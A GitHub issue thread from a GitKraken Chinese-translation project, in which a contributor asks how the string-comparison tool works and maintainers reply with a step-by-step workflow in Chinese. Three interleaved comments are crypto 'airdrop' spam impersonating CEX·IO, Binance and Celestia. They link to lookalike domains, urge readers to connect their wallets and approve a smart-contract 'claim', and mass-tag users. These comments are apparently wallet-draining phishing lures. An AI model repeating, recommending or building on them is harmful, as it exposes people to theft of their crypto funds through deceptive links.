### ISSUE TITLE
这个文件比较工具我没搞懂怎么用，不然我也可以贡献一些翻译

### ISSUE THREAD

**Issue by Chao-zhi** [yk47g/gitkraken-chinese#5]
RT

**Comment by Pesafy** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by MesmerizingXiaoSenSen** [comment]
好复杂

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by andrewluetgers** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!yax75, @catufunwa, @sebastien247, @yang1fan2, @f-ricci, @ccarvalheiro, @Matr1xCode, @Swoorup, @RedmanquezDennis, @prakx1, @dbstyle, @Anan-Saadi, @fdanny, @Mainbiscuit917, @paolodina, @EBhub, @Yaleesa, @Herklos, @lmcdonough, @Buratinas

**Comment by yk47g** [comment]
> 我总结了一下步骤： 1、下载vscode 2、安装 live server 插件 3、创建一个文件夹放入compare.html、当前需要翻译的string.json、之前翻译过的string.json(重命名为zh.json) 如下 ![image](https://user-images.githubusercontent.com/44743391/137101937-91f24d35-0047-447a-8a5e-50fb09a9b599.png) 4、用vscode打开所创建的文件，然后找到compare.html，再右键点击选择“Open with live server ” （确定是否启动为5500端口，不是就将你当前浏览器打开的端口，去替换compare.html中的5500） 5、进行第4步后，会进入compare.html，这时候会自动加载string.json，这时候F12 然后选择console。 6、先点击对比，然后再点击生成json，此时就会生成需要添加到zh.json中的数据（该数据为新版本新增的需要翻译的数据） 7、该数据为json格式，需要使用[格式化工具](https://www.bejson.com/)进行格式化，然后将格式化的数据添加到其中 ![image](https://user-images.githubusercontent.com/44743391/137103672-f98446d3-feca-4eb0-a9ce-ca0e2c447f3b.png) **需要注意：** 需要添加的数据是写入到原有的"menuStrings"。 这是我基于8.0.1处理出来的样例（后面没有翻译的就是添加的） [zh.txt](https://github.com/k-skye/gitkraken-chinese/files/7336732/zh.txt)

感谢提供方法，再加上YuanXiQWQ提供的[About_YouDao_API.md](https://github.com/yk47g/gitkraken-chinese/blob/master/About_YouDao_API.md)应该可以明白了吧。

**Comment by YuanXiQWQ** [comment]
现在一点都不复杂了,只需要按照提示操作就行,最好提前准备一个有道智云或OpenAi的key
